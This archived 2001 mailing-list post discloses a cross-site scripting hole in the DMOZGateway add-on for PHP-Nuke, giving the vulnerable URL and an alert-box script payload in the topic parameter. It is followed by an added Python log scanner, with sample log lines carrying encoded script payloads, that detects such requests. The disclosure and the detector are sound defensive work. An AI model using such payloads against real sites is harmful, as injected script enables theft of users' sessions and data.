Vulnerability Development mailing list archives

CSS in DMOZGateway ( php-nuke )


From: frog frog <leseulfrog () hotmail com>
Date: 16 Dec 2001 10:48:25 -0000



New hole in a phpnuke addon. The addon concerned
is DMOZGateway.
It allows searching the web via the dmoz.org site.
The addon's URL is the following one:

/modules.php?op=modload&name=DMOZGateway&file=index

The cross-site scripting hole is:

/modules.php?op=modload&name=DMOZGateway&file=index&topic=<sc*ript>alert(document.domain)</sc*ript><sc*ript>alert(/test/)</sc*ript>

(without the '*')

frog-m@n
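
A log check for the request pattern reported above, as an added example that is not part of the original post: it scans Common Log Format lines for DMOZGateway requests whose `topic` parameter decodes to HTML markup, including double-encoded values. The function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Client address and request target from a Common Log Format line
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Characters that let a value break out of HTML text or an attribute
MARKUP_RE = re.compile(r"[<>\"']")

# Constructed sample lines (not taken from the original post)
SAMPLE_LOG = [
    '192.0.2.10 - - [16/Dec/2001:10:50:01 +0000] "GET /modules.php?op=modload&name=DMOZGateway&file=index&topic=Computers HTTP/1.0" 200 5120',
    '192.0.2.44 - - [16/Dec/2001:10:51:13 +0000] "GET /modules.php?op=modload&name=DMOZGateway&file=index&topic=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.0" 200 5342',
    '192.0.2.45 - - [16/Dec/2001:10:52:40 +0000] "GET /modules.php?op=modload&name=DMOZGateway&file=index&topic=%253Cscript%253Ealert(/test/)%253C/script%253E HTTP/1.0" 200 5342',
    '192.0.2.46 - - [16/Dec/2001:10:53:02 +0000] "GET /modules.php?op=modload&name=News&file=index&topic=%3Cb%3E HTTP/1.0" 200 2100',
]

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding (e.g. %253C -> %3C -> <)."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_suspicious_topics(log_lines):
    """Return (client, decoded topic) for DMOZGateway requests with markup in topic."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/modules.php"):
            continue
        params = parse_qs(url.query, keep_blank_values=True)  # decodes one layer
        if "DMOZGateway" not in params.get("name", []):
            continue
        for topic in params.get("topic", []):
            topic = fully_decode(topic)
            if MARKUP_RE.search(topic):
                hits.append((client, topic))
    return hits

if __name__ == "__main__":
    for client, topic in find_suspicious_topics(SAMPLE_LOG):
        print(client, repr(topic))
```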

